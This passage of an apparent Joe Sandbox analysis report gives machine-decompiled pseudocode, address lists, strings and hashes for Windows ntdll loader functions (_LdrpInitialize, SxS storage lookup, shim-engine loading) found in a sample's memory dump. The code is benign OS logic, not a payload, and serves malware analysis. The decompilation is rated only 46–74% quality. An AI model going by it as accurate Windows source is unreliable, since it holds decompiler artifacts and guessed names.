							_t55 = _t151 - 0x3c;
							 *_t55 =  *(_t151 - 0x3c) | 0xffffffff;
							__eflags =  *_t55;
							while(1) {
								__eflags =  *0x4da5db0 - 1;
								if(__eflags != 0) {
									goto L6;
								}
								_push(_t151 - 0x40);
								_push(_t148);
								_t106 = E04CF2CF0();
								__eflags = _t106;
								if(_t106 < 0) {
									_t130 =  *0x4da37c0; // 0x0
									__eflags = _t130 & 0x00000003;
									if((_t130 & 0x00000003) != 0) {
										E04D2E692("minkernel\\ntdll\\ldrinit.c", 0x615, "_LdrpInitialize", 1, "Delaying execution failed with status 0x%08lx\n", _t106);
										_t153 = _t153 + 0x18;
										_t130 =  *0x4da37c0; // 0x0
									}
									__eflags = _t130 & 0x00000040;
									if((_t130 & 0x00000040) != 0) {
										asm("int3");
									}
								}
							}
							continue;
						} else {
							_push(_t148);
							_push(_t148);
							_push(_t104);
							_t108 = E04CF29D0();
							_t118 = _t108;
							__eflags = _t108;
							if(__eflags < 0) {
								_t109 =  *0x4da37c0; // 0x0
								__eflags = _t109 & 0x00000003;
								if((_t109 & 0x00000003) != 0) {
									E04D2E692("minkernel\\ntdll\\ldrinit.c", 0x604, "_LdrpInitialize", 1, "NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop\n", _t118);
									_t153 = _t153 + 0x18;
									_t109 =  *0x4da37c0; // 0x0
								}
								__eflags = _t109 & 0x00000040;
								if((_t109 & 0x00000040) != 0) {
									asm("int3");
								}
								goto L51;
							} else {
								_t73 =  *0x4da5db0; // 0x2
							}
						}
						L8:
						_t140 =  *(_t112 + 0x30);
						if(_t73 == 0) {
							_push(_t148);
							_push(_t148);
							_push(_t148);
							_push(0x1f0003);
							_push(0x4da5d50);
							E04CF2E30();
							 *(_t112 + 0xfca) =  *(_t112 + 0xfca) | 0x00000020;
							_t140[0x28] = 0x4da3390;
							 *0x4da65f4 = _t148;
							 *(_t151 - 0x34) =  &(_t140[0xa]);
							asm("lock bts dword [eax], 0x1");
							_t149 = E04D34F99();
							__eflags = _t149;
							if(_t149 >= 0) {
								 *(_t151 - 4) =  *(_t151 - 4) & 0x00000000;
								_t77 = _t140[4];
								 *(_t151 - 0x38) = _t77;
								__eflags =  *(_t77 + 8);
								if(__eflags < 0) {
									 *0x4da5d70 = 1;
									 *0x4da5d08 = 1;
								}
								_t133 =  *(_t151 - 0x28);
								_t149 = L04D2A3F0(_t112,  *((intOrPtr*)(_t151 - 0x20)), _t133, _t140, _t149, __eflags);
								 *(_t151 - 0x1c) = _t149;
								__eflags = _t149;
								if(_t149 < 0) {
									_t79 =  *0x4da37c0; // 0x0
									__eflags = _t79 & 0x00000003;
									if((_t79 & 0x00000003) != 0) {
										E04D2E692("minkernel\\ntdll\\ldrinit.c", 0x678, "_LdrpInitialize", 0, "Process initialization failed with status 0x%08lx\n", _t149);
										_t79 =  *0x4da37c0; // 0x0
									}
									__eflags = _t79 & 0x00000010;
									if((_t79 & 0x00000010) != 0) {
										asm("int3");
									}
									 *(_t151 - 4) = 0xfffffffe;
									goto L14;
								} else {
									__eflags =  *0x4da68d0;
									if( *0x4da68d0 != 0) {
										 *(_t151 - 4) = 0xfffffffe;
										goto L18;
									} else {
										_t124 =  *0x4da5b24; // 0x2f11e20
										_t24 = _t124 + 0x24; // 0x2f11e44
										_t133 = _t24;
										_t25 = _t124 + 0x18; // 0xa70000
										E04CCDF36( *_t25, _t133, 0x14ae);
										_t126 = _t140[0x82];
										__eflags = _t140[0x82];
										if(__eflags != 0) {
											_t149 = E04D33BA3(_t112, _t126, _t140, _t149, __eflags);
											 *(_t151 - 0x1c) = _t149;
										}
										 *(_t151 - 4) = 0xfffffffe;
										_t141 = 0x2000;
										 *0x4da65f4 = 3;
										asm("lock btr dword [eax], 0x1");
										_t127 =  *0x4da670c; // 0x2f122f8
										E04CE64BE(_t127);
										__eflags = _t149;
										if(_t149 < 0) {
											goto L67;
										} else {
											_t79 = E04CE648A(_t133);
											goto L15;
										}
									}
								}
							} else {
								_t79 =  *0x4da37c0; // 0x0
								__eflags = _t79 & 0x00000003;
								if((_t79 & 0x00000003) != 0) {
									E04D2E692("minkernel\\ntdll\\ldrinit.c", 0x660, "_LdrpInitialize", 0, "LDR:MRDATA: Process initialization failed with status 0x%08lx\n", _t149);
									_t79 =  *0x4da37c0; // 0x0
								}
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) != 0) {
									asm("int3");
								}
								goto L14;
							}
						} else {
							 *(_t151 - 0x1c) = _t148;
							if( *0x4da68d0 != 0) {
								L18:
								 *[fs:0x0] =  *((intOrPtr*)(_t151 - 0x10));
								return _t79;
							} else {
								if( *_t140 != 0) {
									_t148 = 0;
									 *0x4da5d50 = 0;
									_t118 = 1;
									_t99 = 2;
									_t133 = 0x4da5db0;
									asm("lock cmpxchg [edx], ecx");
									__eflags = _t99 - 2;
									if(_t99 == 2) {
										__eflags =  *_t140;
										if( *_t140 == 0) {
											_t149 =  *(_t151 - 0x1c);
											goto L62;
										} else {
											_t79 = E04D31B93();
											_t149 = _t79;
											__eflags = _t149;
											if(__eflags >= 0) {
												L62:
												_t79 = E04CE648A(_t133);
											} else {
											}
											goto L11;
										}
										goto L15;
									} else {
										goto L44;
									}
								} else {
									L11:
									if(( *(_t112 + 0xfca) & 0x00000040) == 0) {
										_t166 =  *0x4da5a85;
										if( *0x4da5a85 != 0) {
											_t140 = 0x4da67b4;
											L04CB53C0(0x4da67b4);
											while(1) {
												__eflags =  *0x4da5a85;
												if( *0x4da5a85 == 0) {
													break;
												}
												L04CC21D0(0x4da67b8, _t140, 0, 1);
											}
											E04CB52F0(_t118, _t140);
										}
										_t79 = E04CCDA59(_t112,  *((intOrPtr*)(_t151 - 0x20)), _t140, _t149, _t166);
									}
									L14:
									_t141 = 0x2000;
									L15:
									if(_t149 < 0) {
										L67:
										_t120 = _t149;
										E04D31D5E(_t149);
										_push(_t149);
										_push(0xffffffff);
										_t79 = E04CF2C70();
										__eflags =  *(_t151 - 0x24);
										if( *(_t151 - 0x24) != 0) {
											goto L18;
										} else {
											L04D08AA0(_t120, _t133, _t149);
											asm("int3");
											_t84 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
											__eflags =  *_t84;
											if( *_t84 != 0) {
												_t85 =  *[fs:0x30];
												__eflags =  *(_t85 + 0x240) & 0x00000004;
												if(( *(_t85 + 0x240) & 0x00000004) != 0) {
													_t88 = E04CC3C40();
													__eflags = _t88;
													if(_t88 == 0) {
														_t89 = 0x7ffe0385;
													} else {
														_t89 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
													}
													__eflags =  *_t89 & 0x00000020;
													if(( *_t89 & 0x00000020) != 0) {
														E04D30227(0x1484, _t133 | 0xffffffff, _t133 | 0xffffffff, _t133 | 0xffffffff, 0, 0);
													}
												}
											}
											asm("lock inc dword [0x4da5db0]");
											_t86 =  *0x4da5d50; // 0x50
											__eflags = _t86;
											if(_t86 != 0) {
												_push(0);
												_push(_t86);
												return E04CF2A70();
											}
											return _t86;
										}
									} else {
										if(( *(_t112 + 0xfca) & _t141) == 0) {
											_t79 = E04CF45B0();
										}
										goto L18;
									}
								}
							}
						}
						goto L76;
					}
				}
				L76:
			}

0x04ce6326
0x04ce6327
0x04ce6328
0x04ce632a
0x04ce632c
0x04ce634d
0x04ce634d
0x04ce632e
0x04ce6340
0x04ce6356
0x04ce6342
0x04ce6342
0x04ce6344
0x04ce6346
0x04ce6347
0x04ce6357
0x04ce6359
0x04ce635e
0x04ce6363
0x04ce6366
0x04ce6369
0x04ce6370
0x04ce6373
0x04ce6375
0x04ce637d
0x04ce637d
0x04ce637d
0x04ce6384
0x04ce6385
0x04ce6387
0x04ce638e
0x00000000
0x00000000
0x04d23fde
0x04d23fde
0x04d23fe3
0x04d23fe5
0x04d24031
0x04d24031
0x04d24038
0x04d24038
0x04d24038
0x04d2403c
0x04d2403c
0x04d24043
0x00000000
0x00000000
0x04d2404c
0x04d2404d
0x04d2404e
0x04d24053
0x04d24055
0x04d24057
0x04d2405d
0x04d24060
0x04d24079
0x04d2407e
0x04d24081
0x04d24081
0x04d24087
0x04d2408a
0x04d2408c
0x04d2408c
0x04d2408a
0x04d24055
0x00000000
0x04d23fe7
0x04d23fe7
0x04d23fe8
0x04d23fe9
0x04d23fea
0x04d23fef
0x04d23ff1
0x04d23ff3
0x04d23fff
0x04d24004
0x04d24006
0x04d2401f
0x04d24024
0x04d24027
0x04d24027
0x04d2402c
0x04d2402e
0x04d24030
0x04d24030
0x00000000
0x04d23ff5
0x04d23ff5
0x04d23ff5
0x04d23ff3
0x04ce639d
0x04ce639d
0x04ce63a2
0x04d23e99
0x04d23e9a
0x04d23e9b
0x04d23e9c
0x04d23ea1
0x04d23ea6
0x04d23eab
0x04d23eb3
0x04d23ebd
0x04d23ec6
0x04d23ec9
0x04d23ed3
0x04d23ed5
0x04d23ed7
0x04d23f14
0x04d23f18
0x04d23f1b
0x04d23f1e
0x04d23f22
0x04d23f28
0x04d23f2f
0x04d23f2f
0x04ce6406
0x04ce6411
0x04ce6413
0x04ce6416
0x04ce6418
0x04d23f3b
0x04d23f40
0x04d23f42
0x04d23f5b
0x04d23f63
0x04d23f63
0x04d23f68
0x04d23f6a
0x04d23f6c
0x04d23f6c
0x04d23f6d
0x00000000
0x04ce641e
0x04ce641e
0x04ce6425
0x04d23f79
0x00000000
0x04ce642b
0x04ce6430
0x04ce6436
0x04ce6436
0x04ce6439
0x04ce643c
0x04ce6441
0x04ce6447
0x04ce6449
0x04d23f8a
0x04d23f8c
0x04d23f8c
0x04ce644f
0x04ce6456
0x04ce645b
0x04ce6468
0x04ce646d
0x04ce6473
0x04ce6478
0x04ce647a
0x00000000
0x04ce6480
0x04ce6480
0x00000000
0x04ce6480
0x04ce647a
0x04ce6425
0x04d23ed9
0x04d23ed9
0x04d23ede
0x04d23ee0
0x04d23ef9
0x04d23f01
0x04d23f01
0x04d23f06
0x04d23f08
0x04d23f0e
0x04d23f0e
0x00000000
0x04d23f08
0x04ce63a8
0x04ce63a8
0x04ce63b2
0x04ce63f6
0x04ce63f9
0x04ce6405
0x04ce63b4
0x04ce63b7
0x04d23fbc
0x04d23fbe
0x04d23fc6
0x04d23fc9
0x04d23fca
0x04d23fcf
0x04d23fd3
0x04d23fd6
0x04d24091
0x04d24093
0x04d240a5
0x00000000
0x04d24095
0x04d24095
0x04d2409a
0x04d2409c
0x04d2409e
0x04d240a8
0x04d240a8
0x00000000
0x04d240a0
0x00000000
0x04d2409e
0x00000000
0x04d23fdc
0x00000000
0x04d23fdc
0x04ce63bd
0x04ce63bd
0x04ce63c4
0x04ce63c6
0x04ce63cd
0x04d240b2
0x04d240b8
0x04d240bd
0x04d240bd
0x04d240c4
0x00000000
0x00000000
0x04d240d0
0x04d240d0
0x04d240d8
0x04d240d8
0x04ce63d6
0x04ce63d6
0x04ce63db
0x04ce63db
0x04ce63e0
0x04ce63e2
0x04d240e2
0x04d240e2
0x04d240e4
0x04d240e9
0x04d240ea
0x04d240ec
0x04d240f1
0x04d240f5
0x00000000
0x04d240fb
0x04d240fc
0x04d24101
0x04d2410b
0x04ce649c
0x04ce649f
0x04d24115
0x04d2411b
0x04d24122
0x04d24128
0x04d2412d
0x04d2412f
0x04d24141
0x04d24131
0x04d2413a
0x04d2413a
0x04d24146
0x04d24149
0x04d2415d
0x04d2415d
0x04d24149
0x04d24122
0x04ce64a5
0x04ce64ac
0x04ce64b1
0x04ce64b3
0x04ce64b5
0x04ce64b7
0x00000000
0x04ce64b8
0x04ce64bd
0x04ce64bd
0x04ce63e8
0x04ce63ef
0x04ce63f1
0x04ce63f1
0x00000000
0x04ce63ef
0x04ce63e2
0x04ce63b7
0x04ce63b2
0x00000000
0x04ce63a2
0x04ce637d
0x00000000

Strings

_LdrpInitialize, xrefs: 04D23EEA, 04D23F4C, 04D24010, 04D2406A
minkernel\ntdll\ldrinit.c, xrefs: 04D23EF4, 04D23F56, 04D2401A, 04D24074
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 04D23EE3
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 04D24009
Process initialization failed with status 0x%08lx, xrefs: 04D23F45
Delaying execution failed with status 0x%08lx, xrefs: 04D24063

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 8308b4be8b196518dc219616c0c0ba7855df7e0898f8034fde190dd935297b0b
Instruction ID: 03c969741a25dd04dcfdc27ece064a725ac3ed82a5e8b57c63f716e8a9453a4f
Opcode Fuzzy Hash: 8308b4be8b196518dc219616c0c0ba7855df7e0898f8034fde190dd935297b0b
Instruction Fuzzy Hash: 25912630B01324FBEB25DF25DA59BBA77A2FB20B18F140169E9456B381D778BC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04CE2C10 Relevance: 7.7, Strings: 6, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04CE2C10(intOrPtr _a4, intOrPtr* _a8, signed int* _a12) {
				signed int _v8;
				char _v540;
				signed int _v544;
				char _v556;
				signed int _v560;
				signed int _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				signed int _v576;
				char _v580;
				char _v584;
				char* _v588;
				signed int _v590;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				intOrPtr _v604;
				signed int _v608;
				signed int _v612;
				signed short _v616;
				intOrPtr _v620;
				signed int _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				intOrPtr _t79;
				signed int _t82;
				intOrPtr _t84;
				intOrPtr* _t104;
				void* _t105;
				void* _t106;
				signed int _t109;
				void* _t112;
				intOrPtr _t113;
				void* _t119;
				signed int _t123;
				signed int* _t126;
				void* _t127;
				signed int _t131;
				signed int _t133;

				_t133 = (_t131 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4dab370 ^ _t133;
				_t104 = _a8;
				_t126 = _a12;
				_t76 = _a4 - 1;
				if(_t76 == 0) {
					_v580 = 0x18;
					_push( &_v580);
					_v568 = 0x40;
					_push(8);
					_v600 = 0;
					_push( &_v600);
					_v576 = 0;
					_v572 = 0x4c81338;
					_v564 = 0;
					_v560 = 0;
					_t79 = E04CF2AB0();
					_v620 = _t79;
					if(_t79 >= 0 || _t79 == 0xc0000034 || _t79 == 0xc0000189) {
						_t80 = _v600;
						 *(_t104 + 0x18) =  *(_t104 + 0x18) | 0xffffffff;
						 *((intOrPtr*)(_t104 + 8)) = _v600;
					} else {
						_push(_t79);
						_t80 = E04D3EF10(0x33, 0, "SXS: Unable to open registry key %wZ Status = 0x%08lx\n", 0x4c81338);
						 *((char*)(_t104 + 0x1c)) = 1;
						L36:
						_t133 = _t133 + 0x14;
						if(_t126 == 0) {
							L9:
							_pop(_t119);
							_pop(_t127);
							_pop(_t105);
							return E04CF4B50(_t80, _t105, _v8 ^ _t133, _t115, _t119, _t127);
						}
						_t80 = _v608;
						L38:
						 *_t126 = _t80;
					}
					goto L9;
				}
				_t82 = _t76 - 1;
				if(_t82 != 0) {
					_t80 = _t82;
					if(_t80 == 0 &&  *_t104 != _t80) {
						_push( *_t104);
						_t80 = E04CF2A80();
					}
					goto L9;
				}
				_t84 =  *((intOrPtr*)(_t104 + 4));
				if(_t84 != 0) {
					if(_t84 != 1) {
						_t109 =  *_t104;
						_t80 = _t84 + 0xfffffffe;
						_v608 = _t109;
						_v584 = 0;
						_v596 = _t80;
						if(_t109 == 0) {
							L33:
							 *((char*)(_t104 + 9)) = 1;
							goto L9;
						}
						_push( &_v584);
						_push(0x220);
						_t115 =  &_v556;
						_push( &_v556);
						_push(0);
						_push(_t80);
						_push(_t109);
						_t80 = E04CF2CD0();
						_v624 = _t80;
						if(_t80 >= 0) {
							_t80 = _v544;
							if(_t80 > 0xfffe) {
								L20:
								 *((char*)(_t104 + 8)) = 1;
								if(_t126 != 0) {
									 *_t126 = 0xc0000106;
								}
								goto L9;
							}
							_t115 =  &_v592;
							_v592 = _t80;
							_v590 = _t80;
							_v588 =  &_v540;
							_t80 = E04D3E222(_v608,  &_v592, _t104 + 0xc);
							_v612 = _t80;
							if(_t80 >= 0) {
								goto L9;
							}
							_push(_t80);
							_t80 = E04D3EF10(0x33, 0, "SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx\n",  &_v592);
							 *((char*)(_t104 + 8)) = 1;
							goto L36;
						}
						if(_t80 == 0x8000001a) {
							goto L33;
						}
						_push(_t80);
						_t80 = E04D3EF10(0x33, 0, "SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx\n", _v596);
						_t133 = _t133 + 0x14;
						 *((char*)(_t104 + 8)) = 1;
						if(_t126 == 0) {
							goto L9;
						}
						_t80 = _v600;
						goto L38;
					}
					E04CF5050(_t106,  &_v608, E04CC01C0());
					_t115 = _v616 & 0x0000ffff;
					 *(_t104 + 0xc) = 0;
					_t27 = _t115 + 0x10; // 0x50
					_t80 = _t27;
					if(_t27 > ( *(_t104 + 0xe) & 0x0000ffff)) {
						L22:
						 *((char*)(_t104 + 8)) = 1;
						if(_t126 != 0) {
							 *_t126 = 0xc0000023;
						}
						goto L9;
					}
					E04CF88C0( *((intOrPtr*)(_t104 + 0x10)), _v604, _t115);
					_t133 = _t133 + 0xc;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t80 = _v608 + 0x10;
					L8:
					 *(_t104 + 0xc) = _t80;
					goto L9;
				}
				_t80 =  *( *[fs:0x30] + 0x10);
				_t123 =  *( *( *[fs:0x30] + 0x10) + 0x38) & 0x0000ffff;
				_v596 = _t123;
				_t112 = _t123 + 0x10;
				if(_t112 > 0xfffe) {
					goto L20;
				}
				_t80 =  *(_t104 + 0xe) & 0x0000ffff;
				if(_t112 > ( *(_t104 + 0xe) & 0x0000ffff)) {
					goto L22;
				}
				_t113 =  *((intOrPtr*)( *( *[fs:0x30] + 0x10) + 0x3c));
				if(( *( *( *[fs:0x30] + 0x10) + 8) & 0x00000001) == 0) {
					_t113 = _t113 +  *( *[fs:0x30] + 0x10);
				}
				E04CF88C0( *((intOrPtr*)(_t104 + 0x10)), _t113, _t123);
				_t133 = _t133 + 0xc;
				_t115 = 1;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *(_t104 + 0xc) = _v596 + 0xe;
				if(E04CE3194( *((intOrPtr*)(_t104 + 0x10)), 1) != 0) {
					goto L9;
				} else {
					_t80 = 0;
					goto L8;
				}
			}

0x04ce2c18
0x04ce2c25
0x04ce2c30
0x04ce2c34
0x04ce2c38
0x04ce2c3b
0x04ce2d62
0x04ce2d6a
0x04ce2d6d
0x04ce2d75
0x04ce2d7b
0x04ce2d7f
0x04ce2d80
0x04ce2d84
0x04ce2d8c
0x04ce2d90
0x04ce2d94
0x04ce2d99
0x04ce2d9f
0x04ce2dac
0x04ce2db0
0x04ce2db4
0x04d225a0
0x04d225a0
0x04d225ae
0x04d225b3
0x04d225b7
0x04d225b7
0x04d225bc
0x04ce2cd8
0x04ce2cdf
0x04ce2ce0
0x04ce2ce1
0x04ce2cec
0x04ce2cec
0x04d225c2
0x04d225c6
0x04d225c6
0x04d225c6
0x00000000
0x04ce2d9f
0x04ce2c41
0x04ce2c44
0x04ce2cf0
0x04ce2cf3
0x04d2247e
0x04d22480
0x04d22480
0x00000000
0x04ce2cf3
0x04ce2c4a
0x04ce2c4f
0x04ce2d01
0x04d224c6
0x04d224ca
0x04d224cd
0x04d224d1
0x04d224d5
0x04d224db
0x04d2258c
0x04d2258c
0x00000000
0x04d2258c
0x04d224e5
0x04d224e6
0x04d224eb
0x04d224ef
0x04d224f0
0x04d224f1
0x04d224f2
0x04d224f3
0x04d224f8
0x04d224fe
0x04d22535
0x04d2253e
0x04d2248a
0x04d2248a
0x04d22490
0x04d22496
0x04d22496
0x00000000
0x04d22490
0x04d22548
0x04d2254c
0x04d22551
0x04d2255a
0x04d22562
0x04d22567
0x04d2256d
0x00000000
0x00000000
0x04d22573
0x04d22581
0x04d22586
0x00000000
0x04d22586
0x04d22505
0x00000000
0x00000000
0x04d2250b
0x04d22518
0x04d2251d
0x04d22520
0x04d22526
0x00000000
0x00000000
0x04d2252c
0x00000000
0x04d2252c
0x04ce2d12
0x04ce2d17
0x04ce2d22
0x04ce2d26
0x04ce2d26
0x04ce2d2b
0x04d224a1
0x04d224a1
0x04d224a7
0x04d224ad
0x04d224ad
0x00000000
0x04d224a7
0x04ce2d39
0x04ce2d4b
0x04ce2d4e
0x04ce2d4f
0x04ce2d50
0x04ce2d51
0x04ce2d56
0x04ce2cd4
0x04ce2cd4
0x00000000
0x04ce2cd4
0x04ce2c5b
0x04ce2c5e
0x04ce2c62
0x04ce2c66
0x04ce2c6f
0x00000000
0x00000000
0x04ce2c75
0x04ce2c7b
0x00000000
0x00000000
0x04ce2c8a
0x04ce2c9a
0x04d224be
0x04d224be
0x04ce2ca6
0x04ce2cb6
0x04ce2cbc
0x04ce2cbe
0x04ce2cbf
0x04ce2cc0
0x04ce2cc1
0x04ce2cc5
0x04ce2cd0
0x00000000
0x04ce2cd2
0x04ce2cd2
0x00000000
0x04ce2cd2

Strings

SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 04D22510
SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 04D22579
.Local\, xrefs: 04CE2CB1
SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 04D225A6
@, xrefs: 04CE2D6D
\WinSxS\, xrefs: 04CE2D43

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
API String ID: 0-3926108909
Opcode ID: b51c6ac27423aa70eea67d5c33d940fc2903dea28f0a1bd4ef5315fc759c915a
Instruction ID: d3a0f7c02924f11c205812707b7c2884db8745da62854228ff704fc4717c8b96
Opcode Fuzzy Hash: b51c6ac27423aa70eea67d5c33d940fc2903dea28f0a1bd4ef5315fc759c915a
Instruction Fuzzy Hash: 7781DF716043519FE711CF16C880B2BB7EAFF95718F04899DF8848B291E374E944CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04CA640D Relevance: 7.6, Strings: 6, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E04CA640D(void* __ecx) {
				signed int _v8;
				void* _v12;
				void* _v536;
				void* _v548;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				void* _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				void* _t109;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x4dab370 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_t49 = 0x18;
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = E04CA6C11( &_v788,  &_v876, _t109);
				if(_t52 < 0) {
					_t85 =  *0x4da37c0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = E04CABA80(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return E04CF4B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa35);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E04D2E692();
					_t85 =  *0x4da37c0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				E04CCE8A6(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = E04CA6B45( &_v792,  &_v872, 0,  &_v892);
				if(_v804 != 0) {
					E04CDE7E0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x4da37c0; // 0x0
					__eflags = _t61 & 0x00000003;
					if((_t61 & 0x00000003) != 0) {
						E04D2E692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x4da37c0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x4da5d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					E04CE7DF6( *((intOrPtr*)(_t108 + 0xc)));
					E04CCD3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = E04CA6868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
					if(_t67 < 0) {
						_t85 =  *0x4da37c0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa56);
						goto L11;
					}
					_t104 =  *0x4da9208; // 0x0
					_v872 = _t108 + 0x178;
					_v876 = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x4da5b24; // 0x2f11e20
					asm("ror esi, cl");
					 *0x4da91e0( &_v876, _t71 + 0x24, _t99, 0x20);
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E04CA6565( *((intOrPtr*)(_t108 + 0x14)));
						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
						}
					}
					goto L6;
				}
			}

0x04ca6415
0x04ca6422
0x04ca642e
0x04ca642f
0x04ca6434
0x04ca643a
0x04ca643b
0x04ca6440
0x04ca6446
0x04ca644e
0x04ca6458
0x04ca6460
0x04ca6465
0x04ca646c
0x04d09770
0x04d09776
0x04d09779
0x04d097b3
0x04d097b3
0x04d097dd
0x04d097dd
0x04d097e3
0x04d097e3
0x04ca6542
0x04ca6542
0x04ca654a
0x04d0982b
0x04d0982b
0x04ca6557
0x04ca6558
0x04ca6559
0x04ca6564
0x04ca6564
0x04d0977b
0x04d0977c
0x04d09781
0x04d09783
0x04d09788
0x04d097a0
0x04d097a0
0x04d097a5
0x04d097aa
0x04d097b0
0x00000000
0x04d097b0
0x04ca647e
0x04ca648b
0x04ca6498
0x04ca649e
0x04d097ed
0x04d097ed
0x04ca64a4
0x04ca64a6
0x04d097f7
0x04d097fc
0x04d097fe
0x04d097ce
0x04d097d3
0x04d097d8
0x04d097d8
0x04d097db
0x00000000
0x04ca64ac
0x04ca64b0
0x04ca64be
0x04ca64c3
0x04ca64cc
0x04ca64d1
0x04ca64d8
0x04d09802
0x04d09808
0x04d0980b
0x00000000
0x00000000
0x04d0978f
0x04d09790
0x04d09795
0x04d09796
0x04d0979b
0x00000000
0x04d0979b
0x04ca64de
0x04ca64eb
0x04ca64f1
0x04ca64f9
0x04ca6507
0x04ca6510
0x04ca651c
0x04ca6526
0x04ca652c
0x04ca653c
0x04d0981d
0x04d0981d
0x04ca653c
0x00000000
0x04ca6526

Strings

minkernel\ntdll\ldrinit.c, xrefs: 04D097A0, 04D097C9
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 04D097B9
apphelp.dll, xrefs: 04CA6446
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 04D0977C
LdrpInitShimEngine, xrefs: 04D09783, 04D09796, 04D097BF
Getting the shim engine exports failed with status 0x%08lx, xrefs: 04D09790

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
